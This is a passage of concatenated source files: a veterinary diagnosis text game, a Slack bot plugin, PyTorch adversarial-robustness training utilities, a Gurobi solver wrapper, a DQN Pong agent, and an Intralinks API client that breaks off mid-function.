for i, test in enumerate(dict(story["case"]["tests"]).keys()):
print(i+1, ") ", test)
choices.append(test)
while True:
selection = int(input())
if selection < 1 or selection > len(choices):
print("Invalid choice. Try again.")
else:
return choices[selection-1]
def input_choices():
pass
def show_result(test):
print("\nYou call your tech Sarah to assist with the test.")
print("Result:\n", story["case"]["tests"][test])
def show_play_menu():
while True:
print("\nChoose an action:")
print(" 1) Order a test")
print(" 2) Attempt Treatment")
print(" 3) Review Case")
action = input()
if str(action) == "":
print("Invalid choice")
elif int(action) < 1 or int(action) > 3:
print("Invalid choice. Try again.")
else:
return int(action)
def show_win():
clear()
print("YOU WIN!")
print("\nCongradulations! You have healed your patient, the client loves you, and you're a great Vet! ")
sys.exit(0)
def show_loss(msg):
clear()
print("\nGAME OVER!\n")
print(msg)
print("\nRestart program to try again.")
sys.exit(0)
def treat():
global life
disease = story["case"]["correct_dianosis"]
choices = [disease]
for test in story["case"]["possible_diagnosis"]:
choices.append(test)
for j, choice in enumerate(sorted(choices)):
print(j+1, ") ", choice)
while True:
selection = int(input())
if selection < 1 or selection > len(choices):
print("Invalid choice. Try again.")
else:
break
if str(sorted(choices)[selection-1]).lower() == disease.lower():
show_win()
else:
life = life - 1
if life < 1:
show_loss("Oh no! Your patient died!")
else:
print("\nPatient doesn't seem to be responding to treatment")
def choose_story():
global story
global life
global test_budget
mypath = "./stories/"
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
print("Choose a story to begin:")
for i, file in enumerate(onlyfiles):
print(i+1, ") ", load_story(mypath + file)["title"])
choice = int(input())
story = load_story(mypath + onlyfiles[choice-1])
life = int(story["case"]["life_guesses"])
test_budget = int(story["case"]["test_budget"])
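# Illustrative story file skeleton (an assumption inferred from the keys accessed above
# and in show_intro/order_test/treat; the values are hypothetical, and the key
# "correct_dianosis" keeps the spelling the code expects):
# {
# "title": "The Limping Labrador",
# "intro": "A dog presents with ...",
# "case": {
# "life_guesses": 3,
# "test_budget": 10,
# "tests": {"X-Ray": "No fractures visible.", "Blood panel": "Elevated white cell count."},
# "correct_dianosis": "Lyme disease",
# "possible_diagnosis": ["Arthritis", "Hip dysplasia"]
# }
# }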
# test
# choose_story()
if __name__ == "__main__":
print("\nWelcome to Sunflower Pet Hospital!\n")
choose_story()
show_intro()
while True:
action = show_play_menu()
if action == 1:
test = order_test()
show_result(test)
elif action == 2:
treat()
elif action == 3:
show_intro()
else:
print("Invalid action")
# try:
# except:
# print("Error: The world has ended. Please restart the program.")
|
<filename>plugins/reply_funcs.py
from slackbot.bot import respond_to, listen_to, default_reply
import re
# load external .py files (custom modules)
from plugins.modules.weather_module import WeatherModule
from plugins.modules.apiai_module import ApiaiModule
# instantiate the custom modules
wm = WeatherModule()
am = ApiaiModule()
info="""[とりせつ]
```
私は成長中です.いろんな機能を習得していきます.
基本的に「@bot_cocogs」宛にメンションすれば動作します.
(1)以下メンションを入力すると機能します.
●help
- とりせつを表示します.
●元気?/How are you?
- 固定リプライを送ります.
(2)「**」の間に以下コマンドを入力し,メンション本文を入力すると機能します.
●おうむ/おうむ返し/repeat/Repeat
- メンション例
@bot_cocogs
*おうむ*
おうむ返しして
- メンション本文をおうむ返しします.
●天気/weather
- メンション例
@bot_cocogs
*天気*
今日・北海道
- 指定した「時期(今日,明日,明後日)・地域名」の天気をリプライします.
```
"""
@default_reply()
def default(message):
message.reply("申し訳ございません.対応するメッセージが見つかりませんでした.\n\n" + info)
@respond_to("元気?")
@respond_to("How are you?")
def fixed_reply(message):
message.reply("\n[固定(Fixed)]\nあぁ,元気です.\nWell, I'm fine, thanks.")
@respond_to("help")
def help(message):
message.send(info)
'''
===========================================================================
Command-style implementation
Messages that contain a string enclosed in "**" are handled here.
===========================================================================
'''
@respond_to(u"*.+*")
def starcmd_reply(message):
text=message.body["text"] # get the full text of the mention
reply_type=re.search(r"\*(.+)\*", text) # extract the command identifier (the part enclosed in **) from the mention
if reply_type:
reply_type=reply_type.group(1)
text=re.sub(r"\*(.+)\*", "", text) # strip the command part, keeping only the mention body
if reply_type in {"おうむ","おうむ返し","repeat","Repeat"}:
message.send("\n[おうむ返し(Repeat)]\n```{0}```".format(text))
elif reply_type in {"天気", "weather"}:
try:
wm.arrangeInput(text)
if wm.getWeatherInfo() != -1:
message.reply(str(wm.getWeatherInfo()))
else:
message.reply("\n入力した地域名の天気情報を取得できませんでした.\n再度別の地域名でお試しください.")
except:
message.reply("処理中にエラーが生じました.\n入力した地域名が不適切だったか,システムエラーが発生しています.")
elif reply_type in {"apiai", "APIAI", "Dialogflow", "dialogflow", "API.AI", "DIALOGFLOW"}:
message.reply(str(am.getResponse(text)))
else:
message.send("\n**コマンドを認識できませんでした.")
else:
message.send("")
|
<filename>Rank_study/utils.py
############################################################
#
# utils.py
# utility functions
# September 2019
#
############################################################
import matplotlib as mpl
# if os.environ.get('DISPLAY', '') == '':
print('no display found. Using non-interactive Agg backend')
mpl.use('Agg')
from matplotlib import pyplot as plt
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data as data
import torchvision
import torchvision.transforms as transforms
import numpy as np
from tqdm import tqdm
import os
my_punc = '!"#$%&\'()*+/;<=>?@[\\]^`{|}~'
def adjust_learning_rate(optimizer, epoch, lr, lr_schedule, lr_factor):
if epoch in lr_schedule:
print('(lr drop)')
lr *= lr_factor
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def test_log(out_dir, params, results):
# Check for file
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
fname = os.path.join(out_dir, 'table.csv')
table = str.maketrans({key: None for key in my_punc})
paramstr = str(params).translate(table)
res_str = str(results).translate(table)
with open(fname, 'a') as f:
f.write('\n' + paramstr)
f.write('\n' + res_str)
f.write('\n')
print('\tTest results logged in ' + out_dir + '.')
def data_log(out_dir, params):
# Check for file
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
fname = os.path.join(out_dir, 'table.csv')
table = str.maketrans({key: None for key in my_punc})
paramstr = str(params).translate(table)
with open(fname, 'a') as f:
f.write('\n------------------------------------------\n')
f.write('\tdata re-processed with parameters:\n')
f.write('\t' + paramstr + '\n')
print('Data processing logged.')
def plot_loss(data, epochs, model, outdir):
outstr = outdir+'/e'+str(epochs)+str(model)+'loss'
outstr = outstr.replace(".", "")
fig, ax = plt.subplots(1, 1, figsize=(10, 6))
ax.plot(data, 'b', label='Test')
# ax.set_ylim([-0.001, 0.05])
ax.set_title('Loss')
ax.legend()
fig.savefig(outstr)
def plot_acc(data, epochs, model, outdir):
outstr = outdir+'/e'+str(epochs)+str(model)+'acc'
outstr = outstr.replace(".", "")
fig, ax = plt.subplots(1, 1, figsize=(10, 6))
ax.plot(data[0, :], 'k', label='Train')
ax.plot(data[1, :], 'b', label='Natural Validation')
ax.plot(data[2, :], 'r', label='Robust Validation')
ax.set_title('Accuracy')
ax.legend()
fig.savefig(outstr)
class AugmentedDataset(data.Dataset):
def __init__(self, trainset1, trainset2=None):
super(AugmentedDataset, self).__init__()
self.trainset1 = trainset1
self.trainset2 = trainset2
def __getitem__(self, index):
if self.trainset2:
if index > self.trainset1.__len__() - 1:
return self.trainset2.__getitem__(index - self.trainset1.__len__())[0], \
self.trainset2.__getitem__(index - self.trainset1.__len__())[1], \
True
else:
return self.trainset1.__getitem__(index)[0], \
self.trainset1.__getitem__(index)[1], \
False
else:
return self.trainset1.__getitem__(index)[0], \
self.trainset1.__getitem__(index)[1], \
False
def __len__(self):
if self.trainset2:
return self.trainset1.__len__() + self.trainset2.__len__()
else:
return self.trainset1.__len__()
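# A minimal usage sketch of AugmentedDataset, assuming MNIST can be downloaded to
# ./data; the third element returned by __getitem__ flags samples drawn from the
# second (flipped) dataset.
def _example_augmented_dataset():
    clean = torchvision.datasets.MNIST(root='./data', train=True, download=True,
                                       transform=transforms.ToTensor())
    flipped = torchvision.datasets.MNIST(root='./data', train=True, download=True,
                                         transform=transforms.Compose([
                                             transforms.RandomHorizontalFlip(p=1),
                                             transforms.ToTensor()]))
    ds = AugmentedDataset(clean, flipped)
    img, label, is_flipped = ds[0]
    print(len(ds), img.shape, label, is_flipped)  # 2x the MNIST length; False for index 0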
class AttackPGD(nn.Module):
def __init__(self, basic_net, config, attack):
super(AttackPGD, self).__init__()
self.basic_net = basic_net
self.step_size = config['step_size']
self.epsilon = config['epsilon']
self.num_steps = config['num_steps']
self.attack = attack
def forward(self, inputs, targets):
if not self.attack:
return self.basic_net(inputs), inputs
x = inputs.detach()
x = x + torch.zeros_like(x).uniform_(-self.epsilon, self.epsilon)
for i in range(self.num_steps):
x.requires_grad_()
with torch.enable_grad():
loss = F.cross_entropy(self.basic_net(x), targets, size_average=False)
grad = torch.autograd.grad(loss, [x])[0]
x = x.detach() + self.step_size*torch.sign(grad.detach())
x = torch.min(torch.max(x, inputs - self.epsilon), inputs + self.epsilon)
x = torch.clamp(x, 0.0, 1.0)
return self.basic_net(x), x
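# A small sketch of wrapping a classifier with AttackPGD; the PGD settings below
# are common CIFAR-10 L_inf values chosen for illustration, not taken from this repo.
def _example_attack_pgd():
    basic_net = torchvision.models.resnet18(num_classes=10)
    config = {'step_size': 2.0 / 255, 'epsilon': 8.0 / 255, 'num_steps': 10}
    net = AttackPGD(basic_net, config, attack=True)
    images = torch.rand(4, 3, 32, 32)       # dummy batch of images in [0, 1]
    labels = torch.randint(0, 10, (4,))
    logits, perturbed = net(images, labels)  # forward pass runs the PGD attack
    print(logits.shape, perturbed.shape)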
def max_operator_norm(filter, inp_shape, clip_to):
# compute the singular values using FFT
# first compute the transforms for each pair of input and output channels
transform_coeff = np.fft.fft2(filter, inp_shape, axes=[0, 1])
# now, for each transform coefficient, compute the singular values of the
# matrix obtained by selecting that coefficient for
# input-channel/output-channel pairs
U, D, V = np.linalg.svd(transform_coeff, compute_uv=True, full_matrices=False)
D_clipped = np.minimum(D, clip_to)
# D_clipped = np.where(D<clip_to, 0, D)
if filter.shape[2] > filter.shape[3]:
clipped_transform_coeff = np.matmul(U, D_clipped[..., None] * V)
else:
clipped_transform_coeff = np.matmul(U * D_clipped[..., None, :], V)
clipped_filter = np.fft.ifft2(clipped_transform_coeff, axes=[0, 1]).real
args = [range(d) for d in filter.shape]
# print(clipped_filter.shape, args)
return clipped_filter[np.ix_(*args)]
def max_rank(net, clip_to):
print('Clipping network...')
# Set device
device = 'cuda' if torch.cuda.is_available() else 'cpu'
resnet_sizes = {'conv1.weight': [32, 32],
'layer1.0.conv1.weight': [56, 56],
'layer1.0.conv2.weight': [56, 56],
'layer1.1.conv1.weight': [56, 56],
'layer1.1.conv2.weight': [56, 56],
'layer2.0.conv1.weight': [56, 56],
'layer2.0.conv2.weight': [28, 28],
'layer2.1.conv1.weight': [28, 28],
'layer2.1.conv2.weight': [28, 28],
'layer3.0.conv1.weight': [28, 28],
'layer3.0.conv2.weight': [14, 14],
'layer3.1.conv1.weight': [14, 14],
'layer3.1.conv2.weight': [14, 14],
'layer4.0.conv1.weight': [14, 14],
'layer4.0.conv2.weight': [7, 7],
'layer4.1.conv1.weight': [7, 7],
'layer4.1.conv2.weight': [7, 7]}
for n, p in net.named_parameters():
if n == 'conv1.weight':
continue
elif 'conv' in n and 'weight' in n:
filter = p.permute(2, 3, 0, 1).detach().cpu().numpy()
new_p = torch.FloatTensor(max_operator_norm(filter, resnet_sizes[n], clip_to))
p.data = new_p.permute(2, 3, 0, 1).to(device)
def clip_operator_norm(filter, inp_shape, clip_to):
# compute the singular values using FFT
# first compute the transforms for each pair of input and output channels
transform_coeff = np.fft.fft2(filter, inp_shape, axes=[0, 1])
# now, for each transform coefficient, compute the singular values of the
# matrix obtained by selecting that coefficient for
# input-channel/output-channel pairs
U, D, V = np.linalg.svd(transform_coeff, compute_uv=True, full_matrices=False)
# D_clipped = np.minimum(D, clip_to)
D_clipped = np.where(D<clip_to, 0, D)
if filter.shape[2] > filter.shape[3]:
clipped_transform_coeff = np.matmul(U, D_clipped[..., None] * V)
else:
clipped_transform_coeff = np.matmul(U * D_clipped[..., None, :], V)
clipped_filter = np.fft.ifft2(clipped_transform_coeff, axes=[0, 1]).real
args = [range(d) for d in filter.shape]
# print(clipped_filter.shape, args)
return clipped_filter[np.ix_(*args)]
def clip_network(net, clip_to):
print('Clipping network...')
# Set device
device = 'cuda' if torch.cuda.is_available() else 'cpu'
resnet_sizes = {'conv1.weight': [32, 32],
'layer1.0.conv1.weight': [56, 56],
'layer1.0.conv2.weight': [56, 56],
'layer1.1.conv1.weight': [56, 56],
'layer1.1.conv2.weight': [56, 56],
'layer2.0.conv1.weight': [56, 56],
'layer2.0.conv2.weight': [28, 28],
'layer2.1.conv1.weight': [28, 28],
'layer2.1.conv2.weight': [28, 28],
'layer3.0.conv1.weight': [28, 28],
'layer3.0.conv2.weight': [14, 14],
'layer3.1.conv1.weight': [14, 14],
'layer3.1.conv2.weight': [14, 14],
'layer4.0.conv1.weight': [14, 14],
'layer4.0.conv2.weight': [7, 7],
'layer4.1.conv1.weight': [7, 7],
'layer4.1.conv2.weight': [7, 7]}
for n, p in net.named_parameters():
if n == 'conv1.weight':
continue
elif 'conv' in n and 'weight' in n:
filter = p.permute(2, 3, 0, 1).detach().cpu().numpy()
new_p = torch.FloatTensor(clip_operator_norm(filter, resnet_sizes[n], clip_to))
p.data = new_p.permute(2, 3, 0, 1).to(device)
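# A minimal sketch of applying the spectral clipping above to a torchvision
# ResNet-18, whose layer names happen to match resnet_sizes (an assumption for
# illustration).  Note the naming: clip_network/clip_operator_norm zero out the
# per-frequency singular values below clip_to, while max_rank/max_operator_norm
# cap them at clip_to.
def _example_clip_resnet18():
    net = torchvision.models.resnet18()
    clip_network(net, clip_to=0.5)  # zero singular values smaller than 0.5
    max_rank(net, clip_to=1.0)      # cap the remaining singular values at 1.0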
def get_nuclear_norm(p):
complex_p = torch.stack((p, torch.zeros_like(p)))
complex_p = complex_p.permute(1, 2, 3, 4, 0)
f = torch.fft(complex_p, 3)
s = torch.svd(f, compute_uv=False)
return torch.sum(s)
def train(net, trainloader, optimizer):
# Set device
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# criterion = nn.CrossEntropyLoss()
criterion = nn.NLLLoss()
# Set net to train and zeros stats
net.train()
train_loss = 0
correct = 0
total = 0
iterator = tqdm(trainloader, ncols=0, leave=False)
for batch_idx, (inputs, targets, flip) in enumerate(iterator):
# ### Debug
# if batch_idx > 0:
# continue
# ###
inputs, targets, flip = inputs.to(device), targets.to(device), flip.to(device)
optimizer.zero_grad()
outputs, pert_inputs = net(inputs, targets)
p = F.softmax(outputs, dim=1)
flip = flip.view(-1, 1).float()
softmax_output = torch.mul(p, 1-flip) + torch.mul(1-p, flip)
softmax_output = torch.clamp(softmax_output, 1e-32, 1)
log_softmax_output = torch.log(softmax_output)
loss = criterion(log_softmax_output, targets)
loss.backward()
nn.utils.clip_grad_value_(net.parameters(), 0.1)
optimizer.step()
train_loss += loss.item()
_, predicted = outputs.max(1)
total += (1-flip).sum().item()
correct += ((1-flip).byte().view(1, -1) * predicted.eq(targets)).sum().item()
acc = 100. * correct / total
return train_loss, acc
def test(net, basic_net, testloader, config, params, out_dir, attack, evaluate=False, log=False):
# Set device
device = 'cuda' if torch.cuda.is_available() else 'cpu'
net.eval()
adv_correct = 0
natural_correct = 0
total = 0
results = {}
with torch.no_grad():
iterator = tqdm(testloader, ncols=0, leave=False)
for batch_idx, (inputs, targets) in enumerate(iterator):
# ### Debug
# if batch_idx > 0:
# continue
# ###
inputs, targets = inputs.to(device), targets.to(device)
natural_outputs = basic_net(inputs)
if attack:
if evaluate:
eval_net = AttackPGD(basic_net, config, attack=True)
adv_outputs, pert_inputs = eval_net(inputs, targets)
else:
adv_outputs, pert_inputs = net(inputs, targets)
else:
adv_outputs = natural_outputs
_, adv_predicted = adv_outputs.max(1)
_, natural_predicted = natural_outputs.max(1)
natural_correct += natural_predicted.eq(targets).sum().item()
adv_correct += adv_predicted.eq(targets).sum().item()
total += targets.size(0)
robust_acc = 100. * adv_correct / total
natural_acc = 100. * natural_correct / total
results['Robust acc'] = robust_acc
results['Clean acc'] = natural_acc
if log:
test_log(out_dir, params, results)
return natural_acc, robust_acc
def get_data_sets(dataset, poormin=False):
if dataset == "MNIST":
# Clean data
channels = 1
transform_train = transforms.Compose([
transforms.ToTensor()
])
transform_test = transforms.Compose([
transforms.ToTensor()
])
trainset_clean = torchvision.datasets.MNIST(root='./data', train=True, download=True,
transform=transform_train)
testset = torchvision.datasets.MNIST(root='./data', train=False, download=True,
transform=transform_test)
# Flipped
transform_train = transforms.Compose([
transforms.RandomHorizontalFlip(p=1),
transforms.ToTensor()
])
trainset_flip = torchvision.datasets.MNIST(root='./data', train=True, download=True,
transform=transform_train)
elif dataset == "CIFAR10":
# Clean data
channels = 3
if not poormin:
transform_train = transforms.Compose([
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
])
else:
transform_train = transforms.Compose([
transforms.ToTensor()
])
transform_test = transforms.Compose([
transforms.ToTensor()
])
trainset_clean = torchvision.datasets.CIFAR10(root='./data', train=True, download=True,
transform=transform_train)
testset = torchvision.datasets.CIFAR10(root='./data', train=False, download=True,
transform=transform_test)
# Flipped
transform_train = transforms.Compose([
transforms.RandomHorizontalFlip(p=1),
transforms.ToTensor()
])
trainset_flip = torchvision.datasets.CIFAR10(root='./data', train=True, download=True,
transform=transform_train)
else:
print("Dataset not yet implemented. Terminating.")
return
# Combined
trainset = AugmentedDataset(trainset_clean, trainset_flip)
if not poormin:
trainloader = torch.utils.data.DataLoader(AugmentedDataset(trainset_clean), batch_size=128)
testloader = torch.utils.data.DataLoader(testset, batch_size=128)
else:
trainloader = torch.utils.data.DataLoader(trainset, batch_size=1024)
testloader = torch.utils.data.DataLoader(testset, batch_size=128)
return trainloader, testloader, channels
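# A rough end-to-end sketch tying the helpers above together for a single
# adversarial-training epoch on CIFAR-10; the architecture, optimizer and PGD
# settings are assumptions chosen for illustration.
def _example_one_epoch():
    device = 'cuda' if torch.cuda.is_available() else 'cpu'
    trainloader, testloader, channels = get_data_sets("CIFAR10", poormin=True)
    basic_net = torchvision.models.resnet18(num_classes=10).to(device)
    config = {'step_size': 2.0 / 255, 'epsilon': 8.0 / 255, 'num_steps': 7}
    net = AttackPGD(basic_net, config, attack=True).to(device)
    optimizer = torch.optim.SGD(net.parameters(), lr=0.1, momentum=0.9)
    train_loss, train_acc = train(net, trainloader, optimizer)
    nat_acc, rob_acc = test(net, basic_net, testloader, config, params={},
                            out_dir='./logs', attack=True)
    print(train_loss, train_acc, nat_acc, rob_acc)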
|
<filename>src_py/solver_interfaces/solver_gurobi.py
import math
from gurobipy import *
from solver_interfaces.solver_abstract import AbstractSolver, AbstractCallback
setParam('OutputFlag', 0)
setParam('LazyConstraints', 1)
class SolverGurobi(AbstractSolver):
solver_name = 'Gurobi'
def __init__(self, name):
self.m = Model(name)
self.callback = None
@staticmethod
def get_solver_name():
return SolverGurobi.solver_name
@staticmethod
def check_integrality():
return False
def add_vars(self, collection: {dict, list}):
keys = None
if isinstance(collection, dict):
keys = collection.keys()
elif isinstance(collection, list):
keys = collection
new_vars = self.m.addVars(keys, vtype=GRB.BINARY)
return new_vars
def set_objective_list(self, obj_list: list):
self.m.setObjective(quicksum(obj_list), sense=GRB.MAXIMIZE)
def add_constr_eq(self, expr, rhs: float):
self.m.addConstr(expr == rhs)
def add_constr_le(self, expr, rhs: float):
self.m.addConstr(expr <= rhs)
def add_constr_ge(self, expr, rhs: float):
self.m.addConstr(expr >= rhs)
def add_sos_constr(self, var_list, weights):
self.m.addSOS(GRB.SOS_TYPE1, var_list, weights)
@staticmethod
def quick_sum(var_list):
return quicksum(var_list)
def solve(self, timeout=math.inf):
def callback_function(model, where):
data = [model, where]
if self.callback is None or where not in self.callback.reasons_dict.keys():
return
violated = self.callback.function(data)
return
self.m.setParam('TimeLimit', timeout)
self.m.optimize(callback_function)
optimal = self.m.Status == GRB.OPTIMAL
return self.m.objVal, optimal
def get_objective_value(self):
return self.m.objVal
@staticmethod
def get_val(collection: tupledict) -> dict:
vars_val = {key: v.X for key, v in collection.items()}
return vars_val
def set_callbacks(self, function, lazy=True, cut=True):
reasons_dict = dict()
if lazy:
reasons_dict[GRB.Callback.MIPSOL] = "GRB.Callback.MIPSOL"
if cut:
reasons_dict[GRB.Callback.MIPNODE] = "GRB.Callback.MIPNODE"
self.callback = CallbackGurobi(self, function, reasons_dict)
return
def get_n_vars(self):
return self.m.NumVars
def get_n_constrs(self):
return self.m.NumConstrs
def update(self):
self.m.update()
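# A minimal sketch of driving the wrapper above: a tiny 0/1 knapsack.
# It assumes a working local Gurobi license; the item data is illustrative only.
def _example_solver_gurobi():
    s = SolverGurobi("knapsack_demo")
    items = ["a", "b", "c"]
    values = {"a": 3.0, "b": 5.0, "c": 4.0}
    weights = {"a": 2.0, "b": 4.0, "c": 3.0}
    x = s.add_vars(items)                                     # binary decision variables
    s.set_objective_list([values[i] * x[i] for i in items])   # maximize total value
    s.add_constr_le(SolverGurobi.quick_sum([weights[i] * x[i] for i in items]), 5.0)
    obj, optimal = s.solve(timeout=10)
    print(obj, optimal, SolverGurobi.get_val(x))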
class CallbackGurobi(AbstractCallback):
def __init__(self, model, function, reasons_dict):
self.model = model
self.function = function
self.reasons_dict = reasons_dict
return
def get_val(self, collection: tupledict, data) -> dict:
model, where = data
indices = list(collection.keys())
vars_list = [collection[key] for key in indices]
# TODO: test extensively if this is the correct flow for callbacks
if where == GRB.Callback.MIPNODE:
status = model.cbGet(GRB.Callback.MIPNODE_STATUS)
values_list = model.cbGetNodeRel(vars_list)
# if status == GRB.OPTIMAL:
# values_list = model.cbGetNodeRel(vars_list)
# else:
# values_list = model.cbGetNodeRel(vars_list)
# return None
elif where == GRB.Callback.MIPSOL:
values_list = model.cbGetSolution(vars_list)
else:
values_list = model.cbGetSolution(vars_list)
return {key: values_list[i] for i, key in enumerate(indices)}
@staticmethod
def add_constr(expr, data):
model, where = data
if where == GRB.Callback.MIPNODE:
model.cbCut(expr)
elif where == GRB.Callback.MIPSOL:
model.cbLazy(expr)
def add_constr_le(self, expr, rhs, data):
self.add_constr(expr <= rhs, data)
def add_constr_eq(self, expr, rhs: float, data):
self.add_constr(expr == rhs, data)
def add_constr_ge(self, expr, rhs: float, data):
self.add_constr(expr >= rhs, data)
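# A sketch of wiring a lazy-constraint callback through set_callbacks; the cut
# enforced below (select at most two variables) is purely illustrative.  With
# lazy=True and cut=False the callback only fires at MIPSOL nodes.
def _example_lazy_callback(solver, x_vars):
    def at_most_two(data):
        vals = solver.callback.get_val(x_vars, data)
        if sum(vals.values()) > 2 + 1e-6:
            solver.callback.add_constr_le(quicksum(x_vars.values()), 2, data)
    solver.set_callbacks(at_most_two, lazy=True, cut=False)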
|
<filename>src/agent.py
import torch
from torch import nn
from collections import namedtuple
import random
import numpy as np
import cv2
from torch.optim.lr_scheduler import StepLR
import matplotlib.pyplot as plt
from collections import deque
import PIL.Image as Image
class Network(nn.Module):
def __init__(self, in_channels=4):
super(Network, self).__init__()
self.feature_dim = 512
self.conv1 = nn.Conv2d(in_channels, 32, kernel_size=8, stride=4)
nn.init.kaiming_normal_(self.conv1.weight)
self.conv2 = nn.Conv2d(32, 64, kernel_size=4, stride=2)
nn.init.kaiming_normal_(self.conv2.weight)
self.conv3 = nn.Conv2d(64, 64, kernel_size=3, stride=1)
nn.init.kaiming_normal_(self.conv3.weight)
self.fc4 = nn.Linear(7 * 7 * 64, self.feature_dim)
nn.init.kaiming_normal_(self.fc4.weight)
self.out = nn.Linear(self.feature_dim,3)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.conv1(x))
x = self.relu(self.conv2(x))
x = self.relu(self.conv3(x))
x = x.view(x.shape[0], -1)
x = self.relu(self.fc4(x))
out = self.out(x)
return out
device = "cuda"
class Agent(object):
def __init__(self, player_id=1):
self.network = Network().to(device)
self.target_network = Network().to(device)
self.player_id = player_id
self.optimizer = torch.optim.RMSprop(self.network.parameters(), lr=0.0001)
self.memory = ReplayMemory(40000)
self.batch_size = 32
self.frame_number = 4
self.frames = np.zeros((self.frame_number, 84, 84))  # (frames, H, W), matching the stacking in get_action
self.start = True
self.epsilon = 0.0005
self.discount = .99
self.random_start_iter = 0
self.params = self.network.parameters()
def update_network(self):
"""
Optimize the network using a batch of experience sampled from replay memory
"""
if len(self.memory) < self.batch_size:
return
transitions = self.memory.sample(self.batch_size)
batch = Transition(*zip(*transitions))
non_final_mask = ~torch.tensor(batch.done, dtype=torch.bool)
non_final_next_states = [s for nonfinal, s in zip(non_final_mask,
batch.next_frame) if nonfinal > 0]
non_final_next_states = torch.stack(non_final_next_states).float().to(device)
state_batch = torch.stack(batch.frame).float().to(device)
action_batch = torch.cat(batch.action).long().to(device)
reward_batch = torch.cat(batch.reward).float().to(device)
actions = torch.nn.functional.one_hot(action_batch.view(-1),3)
state_action_values = (self.network(state_batch/255.0)* actions).sum(1)#.gather(1, action_batch)
next_state_values = torch.zeros(self.batch_size,device=device)
next_state_values[non_final_mask] = self.target_network(non_final_next_states/255.0).max(1)[0].detach()
expected_state_action_values = reward_batch + self.discount * next_state_values
self.optimizer.zero_grad()
loss = nn.functional.smooth_l1_loss(state_action_values.squeeze(),
expected_state_action_values)
loss.backward()
self.optimizer.step()
def store_memory(self,state, action, next_state, reward, done):
"""
Method to store a specific observation, action and reward in memory to be used later on
"""
img = Image.fromarray(next_state)
img = img.convert("L")
next_state = img.resize((84, 84), Image.NEAREST)
next_state = np.reshape(next_state, (1, 84, 84))
action = torch.tensor([[action]],dtype=torch.int8)
if reward > 0:
reward = 1
elif reward < 0:
reward = -1
reward = torch.tensor([reward], dtype=torch.int8)
next_state = torch.from_numpy(
np.append(next_state, self.frames[:(self.frame_number-1), :, :], axis=0)).type(torch.uint8)
frames = torch.from_numpy(self.frames).short().type(torch.uint8)
self.memory.push(frames,action, next_state ,reward,done)
def load_model(self):
"""
Loads a trained model from a file
"""
weights = torch.load("model.mdl")
self.network.load_state_dict(weights, strict=False)
def get_action(self, observation) -> int:
"""
Runs the network and selects an action to perform
:return: the action to be performed
"""
img = Image.fromarray(observation)
img = img.convert("L")
observation = img.resize((84, 84), Image.NEAREST)
if self.start:
observation = np.reshape(observation, (84, 84))
self.start = False
self.frames = np.stack((observation, observation, observation, observation), axis=0)
else:
observation = np.reshape(observation, (1, 84, 84))
self.frames = np.append(observation, self.frames[:(self.frame_number-1), :, :], axis=0)
if self.random_start_iter > 0:
self.random_start_iter -= 1
action = np.random.randint(3)
else:
if np.random.random() < self.epsilon:
action = random.randrange(3)
else:
action = self.network(torch.tensor(self.frames.reshape((1,self.frame_number,84,84)),dtype=torch.float32,device=device)/255.0)
_,action = torch.max(action,dim=1)
action = int(action.item())
return action
def get_name(self) -> str:
"""
Function to get the group name
:return: group name
"""
return "NETO_21"
def reset(self):
"""
Function to reset the agent state after each episode
"""
self.frames = np.zeros((self.frame_number, 84, 84))  # (frames, H, W), matching the stacking in get_action
self.start = True
self.appended_frame = 0
def update_target_network(self):
self.target_network.load_state_dict(self.network.state_dict())
Transition = namedtuple('Transition',
('frame', 'action', 'next_frame', 'reward', 'done'))
class ReplayMemory(object):
def __init__(self, capacity):
self.capacity = capacity
self.memory = []
self.position = 0
self.full_warning = True
def push(self, *args):
if len(self.memory) < self.capacity:
self.memory.append(None)
else:
if self.full_warning:
print("Memory Full")
self.full_warning = False
self.memory[self.position] = Transition(*args)
self.position = (self.position + 1) % self.capacity
def sample(self, batch_size):
return random.sample(self.memory, batch_size)
def __len__(self):
return len(self.memory)
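# A rough interaction-loop sketch; `env` is assumed to be a Gym-style Pong
# environment yielding image observations and three discrete actions -- it is
# not provided by this module.
def _example_training_loop(env, episodes=10, target_update_every=5):
    agent = Agent()
    for ep in range(episodes):
        obs = env.reset()
        agent.reset()
        done = False
        while not done:
            action = agent.get_action(obs)
            next_obs, reward, done, _ = env.step(action)
            agent.store_memory(obs, action, next_obs, reward, done)
            agent.update_network()
            obs = next_obs
        if ep % target_update_every == 0:
            agent.update_target_network()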
|
import requests
import intralinks.utils.xml
import intralinks.utils.data
import intralinks.api.logger
import intralinks.api.v1  # Config classes referenced in is_v1()/is_v2() below
import intralinks.api.v2
class ApiClient:
def __init__(self, config=None, session=None, verify_ssl=True):
self.config = config
self.session = session
self.logger = intralinks.api.logger.ApiLogger1()
self.verify_ssl = verify_ssl
def is_v1(self):
return self.config is not None and isinstance(self.config, intralinks.api.v1.Config)
def is_v2(self):
return self.config is not None and isinstance(self.config, intralinks.api.v2.Config)
def get_http_elements_v1(self, method, params=None):
http_method = {'GET':requests.get, 'DELETE':requests.post, 'CREATE':requests.post, 'UPDATE':requests.post}[method]
http_params = {'method':method, 'httpStatus':'F'}
if hasattr(self.config, 'client'):
http_params['client'] = self.config.client
if params is not None:
convert = lambda v: ('T' if v else 'F') if isinstance(v, bool) else v
http_params.update({k:convert(v) for (k, v) in params.items() if v is not None})
return http_method, http_params
def get_http_elements_v2(self, method, params):
http_method = {'GET':requests.get, 'DELETE':requests.delete, 'CREATE':requests.post, 'UPDATE':requests.put}[method]
http_params = None if params is None else {k:v for (k, v) in params.items() if v is not None}
return http_method, http_params
def get_http_elements(self, method, params, headers, authenticated, api_version):
http_headers = headers if headers else dict()
http_cookies = dict()
if authenticated:
self.session.apply(http_headers, http_cookies)
if api_version == 1:
http_method, http_params = self.get_http_elements_v1(method, params)
elif api_version == 2:
http_method, http_params = self.get_http_elements_v2(method, params)
else:
raise Exception()
return http_method, http_params, http_cookies, http_headers
def get(self, relative_url, params=None, stream=False, api_version=None):
http_method, http_params, http_cookies, http_headers = self.get_http_elements('GET', params, headers=None, authenticated=True, api_version=api_version)
response = http_method(
